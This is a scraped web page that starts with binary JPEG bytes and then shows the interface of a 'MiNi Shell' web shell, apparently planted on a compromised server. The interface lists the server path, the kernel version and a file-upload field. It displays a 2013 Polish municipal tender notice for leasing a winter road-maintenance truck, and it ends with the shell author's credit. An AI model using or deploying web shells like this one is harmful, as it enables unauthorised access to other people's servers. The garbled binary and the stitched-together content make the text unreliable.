JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130529/209174-N-2013.html

<p class="kh_header"><b>Kozienice: Dostawa w formie leasingu operacyjnego fabrycznie nowego samochodu ciężarowego 
z trójstronnym wywrotem przeznaczonego do zimowego utrzymania dróg</b><br>
<b>Numer ogłoszenia: 209174 - 2013; data zamieszczenia: 29.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kozienicka Gospodarka Komunalna Sp. z o.o. , ul. Przemysłowa 15, 26-900 Kozienice, woj. mazowieckie, tel. 48 6142403, 6146084, faks 48 6142403.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kgkkozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w formie leasingu operacyjnego fabrycznie nowego samochodu ciężarowego 
z trójstronnym wywrotem przeznaczonego do zimowego utrzymania dróg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego, fabrycznie nowego (nieużywanego) samochodu ciężarowego z trójstronnym wywrotem przeznaczonego do zimowego utrzymania dróg - 1 szt., zwany w dalszej części przedmiotem leasingu. 
2.	Wymagania dotyczące leasingu:
a)	umowa leasingu operacyjnego zostanie zawarta na 60 miesięcy - okres spłaty rat leasingowych,
b)	raty leasingowe ustalone ze zmiennym oprocentowaniem WIBOR 1M średnim z okresu poprzedzającego płatność raty leasingowej, 
c)	raty leasingowe: 59 równych rat leasingowych,
d)	opłata wstępna 10% - wartości netto przedmiotu leasingu, 
e)	opłata końcowa 1% - wartości netto przedmiotu leasingu, 
f)	nie przewiduje się wystąpienia innych dodatkowych kosztów,
g)	wykup przedmiotu leasingu za opłatę końcową,
h)	waluta leasingu - PLN,
i)	Zamawiający zastrzega sobie prawo wyboru ubezpieczyciela, ponieważ sam będzie ponosił koszty ubezpieczenia przedmiotu leasingu,
j)	pozostałe warunki leasingu regulowane są przez wewnętrzny regulamin Leasingodawcy oraz postanowienia Kodeksu cywilnego.
3.	Wymagane parametry pojazdu:   
A)	Charakterystyka podwozia: 
1.	Podwozie fabrycznie nowe rok produkcji 2013  
2.	Podwozie o dopuszczalnej masie całkowitej min 18t
3.	Silnik spełniający normę emisji spalin Euro 5 poprzez recyrkulację spalin ( bez Ad Blue ) 
o mocy min 210 kW
4.	Sprzęgło wzmocnione o grubości min 5mm
5.	Tłumik z rurą wydechową do dołu
6.	Skrzynia biegów min 8 biegów do przodu i 1 do tyłu
7.	Podwozie wyposażone fabrycznie w podwójną pompę zębatą dostosowaną do parametrów zabudowy
8.	Przystawka odbioru mocy
9.	Przednia oś o dopuszczalnym obciążeniu  min 7500kg
10.	Oś przednia kierowana
11.	Przednie zawieszenie paraboliczne
12.	Tylna oś  o dopuszczalnym obciążeniu min 12000kg
13.	Oś tylna napędzana
14.	 Tylne zawieszenie pneumatyczne
15.	Blokada mechanizmu różnicowego
16.	Stabilizator osi przedniej i tylnej
17.	Zbiornik paliwa min 170 litrów
18.	Immobilizer
19.	Rozstaw osi max 3600 mm
20.	Grubość profilu ramy min 7 mm
21.	Zderzak stalowy
22.	Sprzęg oraz instalacja do przyczepy
23.	Układ hamulcowy wyposażony w ABS, ASR, ESP
24.	Hamulce tarczowe osi przedniej i tylnej
25.	Osuszacz powietrza podgrzewany
26.	Kabina dzienna trzyosobowa, przeszklona w tylnej części, wyposażona w centralny zamek drzwi
27.	Szyba przednia ogrzewana
28.	Lusterka wsteczne elektrycznie sterowane i ogrzewane
29.	Klimatyzacja
30.	Dwa reflektory robocze oświetlające pole pracy wywrotu
31.	Lampy ostrzegawcze na dachu kabiny
32.	Radio CD
33.	Radio CB wraz z anteną na dachu
34.	Gniazdo elektryczne w kabinie 12 V i 24 V
35.	Akumulatory min 170 Ah
36.	Podwozie przygotowane fabrycznie do montażu czołownicy
37.	Kolor kabiny RAL 2011 ( pomarańcz )
38.	Opony min 315/80 R22,5 z bieżnikiem szosowo terenowym
39.	Elektryczne sterowanie szyb
40.	Gaśnica polska
41.	Dywaniki gumowe
42.	Pokrowce na fotele
43.	Podnośnik hydrauliczny 10t
44.	Klin pod koła 
45.	Osłony reflektorów przednich i lamp tylnych
46.	Instrukcja obsługi w języku polskim
47.	Gwarancja 24 miesiące

B)	Parametry techniczne wywrotki:
1.	Długość gabarytowa 4200 - 4300 mm
2.	Szerokość gabarytowa do max. 2550 mm
3.	Wysokość burt 550 -  600 mm
4.	Siatka na przedniej burcie do wysokości kabiny
5.	Podłoga stalowa z blachy typu HARDOX
6.	Burty stalowe , wzmocnione z blachy typu DOMEX o gr. min. 70 mm
7.	Burty boczne z zawiasami w osi dolnej i górnej
8.	System wspomagania otwierania i zamykania burt bocznych sprężyny
9.	Burta tylna z zawiasami górnymi i dolnymi
10.	Otwieranie mechaniczne - ręczne
11.	Mocowania do posypywarki
12.	Plandeka rolowana
13.	Siłownik
14.	Układ hydrauliczny
15.	Osłony p-rowerowe
16.	Błotniki na koła
17.	Żółte światła obrysowe
18.	Oklejenie konturowe taśmami odblaskowymi
19.	Kolor ramy pomocniczej RAL 9011
20.	Kolor skrzyni ładunkowej RAL 2011
21.	Gwarancja 24 miesiące

C)	Parametry techniczne posypywarki:
1.	Pojemność ładunkowa skrzyni min. 6 m3
2.	Napęd od pompy hydraulicznej fabrycznie zamontowanej do odsilnikowej przystawki
odbioru mocy do pracy ciągłej podwozia.
3.	Układ solankowy o pojemności min. 1 750 litrów - 2 zbiorniki po obu stronach   
           posypywarki.
4.	Dostosowana do rozsypywania różnych materiałów np.: chlorek sodu, chlorek wapnia, piasek, mieszanka chlorowo-solna,   mieszanka piaskowo-solna z możliwością zaprogramowania parametrów rozsypywanego materiału: ciężaru właściwego lub wielkości ziaren (granulacji).
5.	Przystosowana do montażu na skrzyni ładunkowej samochodu za pomocą 4 łańcuchów
6.	Podpory demontażowe (szt.4) z mechanizmem korbowym w zakresie unoszenia
7.	Taśmowy system podawania środków chemicznych o szerokość taśmy min. 400 mm.
8.	Profilowana gumowa taśma transportera, na całej długości podparta na płycie ślizgowej
zapewniająca rozdrabnianie   zbrylonego   lub   zawilgoconego   materiału poprzez
ograniczenie otwarcia klapy dozującej do wysokości: 40 mm dla soli, 120 mm dla piasku
9.	Dozowanie dawki rozsypywanego materiału poprzez zmianę prędkości taśmy transportowej.
10.	Regulowana wysokość talerza rozrzucającego
11.	Możliwość    zaprogramowania    wartości    max.    i    min.    parametrów   posypywarki    i zabezpieczenia  tych   wartości   kodem   przed   osobami   nieupoważnionymi.
12.	Możliwość zaprogramowania min. trzech rodzajów materiału stałego i 1 cieczy w tym: 2 rodzaje materiałów ze zwilżeniem i 1 rodzaj na sucho.
13.	Możliwość symulacji jazdy z prędkością 30km/godz, z możliwością zmiany prędkości symulowanej w zakresie 5-50km/godz. uruchamianej na postoju lub podczas jazdy z dowolną prędkością za pomocą pilota
14.	Automatyczny system sterowania zapewniający stabilność gęstości posypywania (g/m2) oraz szerokości sypania (m) niezależnie od prędkości jazdy pojazdu poprzez połączenie z tachografem lub wyjścia sygnału droga prędkość do układu sterowania posypywarki.
15.	Szerokość sypania regulowana w zakresie od 2 do 8 m (co jeden metr).
16.	Układ sterowania z kabiny kierowcy zapewniający stopniowanie:
           - z krokiem co 1 g/ m2 przy dozowaniu soli w zakresie 5 - 40 g/ m2 .
- z krokiem co 10 g/ m2 przy dozowaniu mieszanki uszorstniającej                                                    w zakresie 20 - 300 g/ m2  
17.	Rynna zasypowa oraz talerz rozsypujący wykonane ze stali kwasoodpornej.
18.	Możliwość asymetrycznego posypywania sterowana z pulpitu
19.	Sita nasypowe ( wielkość oczek ok. 40x40 mm) zabezpieczające skrzynie solarki przed załadunkiem brył i zanieczyszczeń.
20.	Skrzynia ładunkowa z   przykryciem wodoodpornym   i   mechanizmem   otwierania przez operatora stojącego na ziemi.
21.	Możliwość odczytania na pulpicie sterowniczym danych pracy posypywarki tj.: długość przejechanej trasy, zużycie środków chemicznych, zużycie solanki oraz czasu pracy
           -  dziennie z możliwością resetowania, w metrach, kilogramach, litrach, godzinach
           - narastająco bez resetowania w kilometrach, tonach, m3,godzinach wraz z drukarką termiczną do wydrukowania w/w danych.
22.	Oddzielna zewnętrzna (przenośna) karta pamięci dowolnie formatowana do 8, 16, 32, 64, 128MB pamięci (współpracująca z gniazdem złącza, na pulpicie sterującym do automatycznego zapisywania w/w danych i ich przenoszenia do komputera
23.	Czytnik do wymaganej karty pamięci szt. 1 na całą dostawę
24.	Oprogramowanie do gromadzenia danych ich przetwarzania oraz prowadzenia analizy i
statystyk eksploatacji szt 1. na całą dostawę.
25.	Sterowanie posypywarką z pulpitu w kabinie pojazdu.
26.	Dodatkowe informacje wyświetlane na pulpicie sterującym
             - dane   posypywarki    (nazwa,    producent,   typ,   numer   seryjny,    rok   produkcji,     wersja oprogramowania)
           - dane pilota oraz panelu sterującego (wersja oprogramowania oraz numer seryjny)
27.	Tylny reflektor umożliwiający obserwacje posypywania w nocy (czerwone światło).
28.	Elektroniczny układ kontroli posypywania bezstykowy z czujnikiem podczerwieni
umieszczonym przy talerzu rozrzucającym reagujący bezstykowo na strumień rozrzucanego materiału.
29.	Drabinka podnoszona  
30.	 Kolor RAL 2011,
31.	Znak bezpieczeństwa CE

D)	Parametry techniczne pługa:
1.	Wysokość odkładnicy z lemieszem min. 1 100 mm.
2.	Długość odkładnicy (lemiesza) min. 3 000 mm.
3.	Szerokość odśnieżania min. 2,5 m.
4.	Ciężar pługa max. 600 kg.
5.	Napęd sterowania pługa od układu hydraulicznego zabudowanego na podwoziu zasilanego przez pompę hydrauliczną zamontowaną fabrycznie do odsilnikowej przystawki odbioru mocy do pracy ciągłej podwozia.
6.	Dwuwarstwowa odkładnica wykonana jako jednolita całość z pustą przestrzenią
  wewnątrz tłumiącą drgania i hałas w czasie pracy
7.	Sterowania z pulpitu sterującego w kabinie kierowcy z funkcjami: podnoszenie, opuszczanie, skręcanie na boki, docisk.
8.	Tłoczyska siłowników wykonane ze stali szlachetnej lub chromowane.
9.	Możliwość docisku pługa do nawierzchni podczas pracy.
10.	System bezpieczeństwa z zaworem przeciążeniowym,   działający w przypadku nagłego   uderzenia w odkładnicę   podczas   pracy,  powodujący jej   uskok   przeciwdziałający uszkodzeniu.
11.	Jednolita odkładnica z tworzywa sztucznego nie wymagająca dodatkowej konstrukcji metalowej do wyprofilowania jej kształtu.
12.	Odkładnica wykonana z tworzywa sztucznego barwionego w kolorze pomarańczowym (nie malowana)
13.	Wszystkie części stalowe zabezpieczone antykorozyjnie.
14.	Tworzywo odkładnicy posiadające  pamięć    kształtu   tzn. przy odkształceniach spowodowanych uderzeniem w czasie kolizji nie pękając powraca do pierwotnego kształtu.
15.	Dwa koła podporowe samoskrętne z płynną regulacją pionową za pomocą mechanizm korbowego, przystosowane do pracy z prędkością roboczą 60 km/h.
16.	Dzielone gumowe listwy zgarniające, uchylne niezależnie od siebie z możliwością regulacji siły uginającej.
17.	System hydrauliczny umożliwiający prace pługa w położeniu pływającym.
18.	System hydrauliczny docisku pługa do nawierzchni w czasie pracy.
19.	Płyta montażowa DIN 5 do zamontowania pługa zamiennie z przednią szczotką zamiatarki.
20.	Listwy zgarniające uchylne o min. 75 ° niezależnie od siebie z możliwością regulacji siły uginającej poprzez naciąg sprężyn umieszczonych (nawiniętych) w osi obrotu listew.
21.	Odboje przykrawężnikowe po lewej i prawej stronie pługa.
22.	Zabezpieczenie utrzymujące pług w pozycji transportowej.
23.	Światła obrysowe pługa (LED)
24.	Biało - czerwone pasy odblaskowe na skraju pługa.
25.	Ucho transportowe do demontażu i transportu pługa.
26.	Podpory demontażowe.
27.	Znak bezpieczeństwa CE

E)  Warunki dodatkowe 
        a) maksymalna odległość autoryzowanego punktu naprawczego (serwisu) dla oferowanego   sprzętu - 150 km od Kozienic..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.13.00.00-7, 34.14.20.00-4, 34.14.30.00-1, 66.11.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny sprawdzania niniejszego warunku na podstawie oświadczenia potwierdzającego spełnianie warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się wykonaniem co najmniej dwóch  dostaw pojazdów przeznaczonych do zimowego utrzymania dróg o wartości brutto nie mniejszej niż 300 000 PLN każda z dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności w tym okresie.    
Opis sposobu dokonywania oceny tego warunku
Zamawiający dokona oceny sprawdzania tego warunku na podstawie wykazu wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane należycie..</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny sprawdzania niniejszego warunku na podstawie oświadczenia potwierdzającego spełnianie warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny sprawdzania niniejszego warunku na podstawie oświadczenia potwierdzającego spełnianie warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny sprawdzania niniejszego warunku na podstawie oświadczenia potwierdzającego spełnianie warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty sporządzonej w oparciu o załącznik nr 1 do SIWZ, Wykonawca zobowiązany jest dołączyć następujące dokumenty:
a)	dokumenty wymienione w pkt. V SIWZ,
b)	pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty wspólnej w oparciu o art. 23 ustawy (oferta wspólna),
c)	pełnomocnictwo do podpisania oferty o ile nie wynika ono z załączonych dokumentów do oferty (jeżeli dotyczy),
d)	formularz cenowy / opłat leasingowych - sporządzony zgodnie z załącznikiem nr 1a do SIWZ,
e)	zgodnie z art. 26 ust. 2d ustawy, Zamawiający wymaga dołączenia do oferty listę podmiotów należących wraz z Wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) lub informację o tym, że Wykonawca nie należy do grupy kapitałowej. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia listę lub informację, o których mowa powyżej, powinien złożyć każdy z Wykonawców.
f)	katalogi reklamowe oferowanego przedmiotu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością wykonania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kgkkozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kozienicka Gospodarka komunalna Sp. z o. o., 26-900 Kozienice, ul. Przemysłowa 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 12:15, miejsce: Kozienicka Gospodarka komunalna Sp. z o. o., 26-900 Kozienice, ul. Przemysłowa 15 - biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com